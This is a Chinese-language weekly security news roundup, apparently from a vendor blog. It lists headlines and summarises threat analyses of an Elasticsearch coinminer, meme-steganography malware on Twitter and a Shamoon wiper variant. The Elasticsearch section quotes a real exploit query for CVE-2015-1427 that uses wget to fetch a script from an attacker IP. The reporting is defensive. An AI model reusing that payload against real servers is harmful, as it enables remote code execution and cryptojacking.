《資安新聞周報》鸚鵡居然叫 Alexa 下訂西瓜和燈泡/駭客利用 Twitter 發送 Meme迷因梗圖/客攻擊由 IT 轉向 OT,人機界面是主要漏洞

本周資安新聞週報重點摘要,本文分享上週資安新聞及事件。你將會看到新聞的簡短摘要及原文連結來閱讀更詳細的見解。

資安趨勢部落格一周精選

媒體資安新聞精選:

趨勢科技2018年Capture The Flag (CTF)網路攻防搶旗賽台灣隊伍奪冠,年輕好手體驗真實的網路資安世界  在網路資安關鍵領域大展身手     電腦硬派月刊

趨勢科技的 2019 資安年度大預測:駭客攻擊由 IT 轉向 OT,人機界面是主要漏洞      科技報橘網

《科技》趨勢科技2019資安年度預測報告,3點警示   中時電子報網

小心!別亂點連結 趨勢科技:2019年網路釣魚估大增        ETtoday新聞雲

駭帳號將超越駭系統!趨勢公布 2019 攻擊預測大全    INSIDE

趨勢科技公布2019資訊保安預測      Media OutReach

LINE登入不必輸入密碼 最快明年上路      工商時報電子報

兩年前被Twitter輕忽的臭蟲遭到駭客開採,洩漏用戶的國碼       iThome

多樣的社交工程手法網紅成駭客新目標,入侵掌握帳號或是當作散佈惡意連結的管道    科技新報網

打擊假新聞 不要劃錯重點  自由時報

趨勢科技網路攻防搶旗賽 台灣隊伍奪冠  中央通訊社

四種電子郵件 威脅企業安全      CIO IT經理人

【資安】一頁式詐騙不只臉書&#65281,就算入口網站&#12289,Yahoo新聞也有陷阱  這是假消息

間諜皮卡丘?俄網軍介入大選,Pokémon Go成煽動工具       聯合新聞網

人臉辨識真的安全嗎!? 3D列印頭像成功騙過Samsung S9,但iPhone X擋住了  iThome

隱私被看光?澳洲通過新法 允許政府取得加密訊息      匯流新聞網

推特爆個資外洩疑慮 股價重挫7%    聯合新聞網

42款中國APP會竊取個資?印度政府當時呼籲軍方刪除!   這是假消息

注意了!偽造的Office 365無法傳遞通知成為駭客網釣新手法     iThome

SQLite爆重大漏洞! 數百萬app和IoT裝置資料安全拉警報  iThome

人工智慧仍然存在信任問題        電子工程專輯

聖誕節玩具驚選,你的玩具可能讓孩子暴露在危險之下        Content Party

2018年最糟糕的25組密碼揭曉 這2組蟬聯冠亞軍       匯流新聞網

2018年密碼觀念最差者:五角大厦、Nutella榜上有名,Google意外拿下第八  iThome

語音助理太好用?英國鸚鵡叫 Alexa 下訂西瓜和燈泡   INSIDE

凍結兩個多月後,Windows 10 1809版終於重新開放!但僅限手動下載      iThome

日本 Line強化資料防護 收購南韓網路安全公司    經濟日報(臺灣)

LINE首度揭露LINK區塊鏈生態系將主攻4國市場,包括臺灣!   iThome

AI 種黃瓜大賽結果揭曉,微軟擊敗騰訊、英特爾奪冠   科技新報網

黃背心恐有俄國網軍操作 法國安單位要查      新頭殼

中網攻美軍包商 軍艦、飛彈機密遭駭      自由時報

伊朗駭客假冒Gmail和Yahoo Mail遭駭通知信來發送釣魚郵件,專門鎖定記者、社運人士和官員        iThome

中國駭客疑入侵歐盟外交通訊 上千敏感電文曝光  新頭殼

德國資安辦公室:部份德企可能受中國駭客攻擊    自由時報電子報

雙因素驗證並非100%安全,伊朗駭客成功繞過驗證機制入侵Gmail、Yahoo帳號     T客邦

捷克宣告抵制華為!印度電信業也跟進 致函政府向華為說不      ETtoday新聞雲

跟進封殺 捷克政府禁用華為手機      台灣蘋果日報

以桌遊模擬國家當局資安攻防!捷克資安專家首度在臺舉行相關演練        iThome

推行政府應為雲端服務建立相關規範,雲端安全聯盟促使新加坡當局成立COIR指南      iThome

別說不可能!這六大網路安全問題你一定都遇過!『 PC-cillin 2019雲端版 』教你如何輕鬆預防 雅虎奇摩

趨勢科技:推特帳號淪為駭客攻擊幫兇,發送meme圖片下令惡意程式發動攻擊    iThome

歐盟推超高罰額私隱法 業界憂刺激網絡勒索罪行  東網 (台灣版)

人工智慧加持社會企業,若水建構 AI 數據處理平台為身障者創工作機會 科技新報網

【面對漏洞通報,企業與通報者要能互信】今年HITCON ZeroDay平臺已有14個組織推獎勵計畫        iThome

中華電信資安 防駭大賽奪冠 專業能力堅強 成功抵擋駭客攻擊 發揮互助精神 分享情資 獲頒特別獎        經濟日報(臺灣)

民生公共物聯網產業聯盟 今日(12/17)宣誓成立!  中央通訊社

掌握低成本高效率防禦訣竅,讓資安成為營運助力而不是阻力    聯合新聞網

資安黑天鵝亂竄 還能鴕鳥心態?      聯合報

為臺灣高等資安教育努力,持續強化暑期與跨校課程,與國際結合則成新手段        iThome

強韌的恢復能力已成為資安攻防的重要心法    iThome

讓用戶自然而然操作才是正道,GNOME資安團隊從軟體開發強化作業系統安全 iThome

經濟部推動物聯網資安標章  新通訊元件雜誌

《科技選擇》:我們能讓人工智慧驅動的機器人「自主殺人」嗎?      關鍵評論網

抵禦中國資安威脅 日政府編列預算開發反駭客程式      台灣英文新聞

繼續閱讀

虛擬貨幣病毒透過 Elasticsearch 舊漏洞散播

趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P

/tmp/sssooo\”).getText()”}}}”

這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。

Figure 1. GreyNoise marked the host as a known scanner

圖1、GreyNotes將此這主機標記為已知掃描器

 

要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。

這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtoolsconfig.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀

趨勢科技公布2019資安預測:資料外洩攻擊白熱化、網路釣魚攻擊件數明顯大增、工控系統威脅持續升高

企業與個人資安意識內化,採取跨世代防護技術多層式保護連網安全

【2018年12月19日,台北訊】全球網路資安解決方案領導廠商趨勢科技(東京證券交易所股票代碼:4704)發表2019年資安年度預測報告,針對網路安全威脅與網路犯罪攻擊趨勢,提出三大重點警示:憑證資料外洩遭盜用詐騙事件將不斷增加、網路釣魚攻擊手段將取代漏洞攻擊套件成為主要攻擊手法以及工控系統的安全性持續受到威脅。

趨勢科技臺灣區暨香港區總經理洪偉淦表示:「回顧今年全球資安政策推動,可觀察到各組織及企業對於資料安全的重視; 重大資訊安全事件的發生亦凸顯連網裝置普及所面臨的資安問題。預期在2019年企業和組織將導入更多連網設備,而連網速度也將大幅提升,資訊安全將面臨更廣泛與多元的挑戰,不僅企業對於資訊安全團隊的需求將提高,多層式智能防護的資安政策將在企業經營中扮演關鍵的角色,企業領導人對於網路安全的重視及培養經營團隊資安意識,更是建構自身企業網路安全防護架構的重要基石。」

趨勢科技台灣區暨香港區總經理洪偉淦於2019年資安預測媒體活動中表示,預期2019年企業和組織將導入更多連網設備,資訊安全策略將成為企業營運關鍵
趨勢科技台灣區暨香港區總經理洪偉淦於2019年資安預測媒體活動中表示,預期2019年企業和組織將導入更多連網設備,資訊安全策略將成為企業營運關鍵

繼續閱讀

駭客利用 Twitter 發送 Meme迷因梗圖,藉圖像隱碼術( Steganography )躲避偵測

圖像隱碼術(Steganography) – 將惡意檔案藏在圖片中來躲避偵測的方法,一直以來都被駭客用來散播惡意軟體或進行其他惡意攻擊。趨勢科技最近發現有駭客在「MEME」迷因圖(梗圖)上使用了這種技術。在10月25日和26日,攻擊者透過一個在2017年建立的 Twitter 帳號發表了兩條包含惡意Meme迷因圖的推文。圖內嵌了命令,讓惡意軟體從惡意 Twitter 帳號下載到受害者電腦後加以解析。變成電腦內惡意軟體的C&C服務。但要注意的是,惡意軟體並非從 Twitter下載,我們也沒有觀察到惡意軟體是用哪種機制散播給受害者。

 

編按:「Meme」指在網路上快速傳播擴散的爆紅內容,也有用發音/miːm/直譯為「迷因」, Meme圖通常指具有某種梗的圖片。

 

這個新威脅(偵測為TROJAN.MSIL.BERBOMTHUM.AA)值得注意的地方在於,惡意軟體透過合法服務(也是熱門的社群網路平台)接收命令,使用看似正常實為惡意的Meme迷因圖,而且除非關閉惡意Twitter帳號,不然無法中斷此威脅。Twitter在2018年12月13日已經關閉了該帳號。

隱藏在所提到圖片中的命令是「/print」,指示惡意軟體擷取受感染電腦的螢幕截圖。螢幕截圖會被送到駭客控制的C&C伺服器(利用pastebin.com來取得網址)。

截取受感染電腦螢幕截圖回傳給駭客

趨勢科技發現,一旦惡意軟體在受感染電腦上執行,就會將從Twitter帳戶下載惡意Meme迷因圖到受害者電腦上。接著會取出圖內所藏的命令,在此次案例中是「print」命令,讓惡意軟體截取受感染電腦的螢幕截圖。接著惡意軟體會從Pastebin取得C&C伺服器資訊。再將所收集的資訊或命令輸出上傳到指定網址,傳送給攻擊者。

圖1、顯示Pastebin網址的惡意軟體程式碼

 

在分析過程中,我們看到Pastebin取得的網址指向內部或私有IP地址,這可能只是攻擊者臨時的設定。

圖2、Pastebin取得的網址指向私有IP地址

繼續閱讀

【資安】曾攻擊全球最大石油公司Shamoon/Disttrack 磁碟清除病毒,出現了新變種:你需要知道什麼

2012年全球最大石油公司遭駭 75%電腦受感染, 資安專家分析,造成3萬部電腦受影響的就是Shamoon病毒。2016年媒體報導沙烏地阿拉伯遭到「國家級」駭客攻擊 ,Shamoon 惡意程式出現升級版,攻擊沙國數個政府機關。近日趨勢科技看到了惡名昭彰的磁碟清除病毒Shamoon(又稱Disttrack)出現更新版本的報導。同時也發現了好幾個此版本Shamoon 的樣本(趨勢科技偵測為Trojan.Win32.DISTTRACK.AA和 Trojan.Win64.DISTTRACK.AA)。雖然無法確認此版本的病毒是否真的有在外面散播,但我們正在分析此病毒來確認其功能,因為它所可能帶來的破壞性影響。

趨勢科技的趨勢科技XGen™ 防護透過主動式技術(如行為分析和高保真機器學習)能夠保護使用者和企業不會遭受此磁碟清除病毒影響。以下是使用者和企業關於最新的Shamoon病毒所需要知道的資訊:

Shamoon/Disttrack磁碟清除病毒出現了新變種:你需要知道什麼
Shamoon/Disttrack磁碟清除病毒出現了新變種:你需要知道什麼

什麼是Shamoon/Disttrack

Shamoon(或稱Disttrack)蠕蟲是種磁碟清除病毒。它會覆蓋掉受感染電腦內的檔案,同時會感染主開機紀錄(MBR)。它的第一代會覆蓋掉文件、圖像、影片和音樂檔,清除MBR並換成燃燒旗幟的圖檔。第二代使用的是張有名的難民照片。

新版本的Shamoon似乎具備相同的MBR清除功能。而據報跟之前刪除替換檔案的版本不同的是,這次有不可逆轉的加密檔案功能。它似乎也缺少一些元件,例如用於網路橫向移動及命令和控制(C&C)通訊的預設憑證。我們還在進行分析中,一旦有更新資訊就能夠加以確認。

 

這新版本的Shamoon/Disttrack有實際在外散播嗎?

根據報導,一個包含最新版 Shamoon的檔案從義大利上傳到VirusTotal。我們並沒有發現任何跡象顯示此版本的Shamoon有在外擴散。

繼續閱讀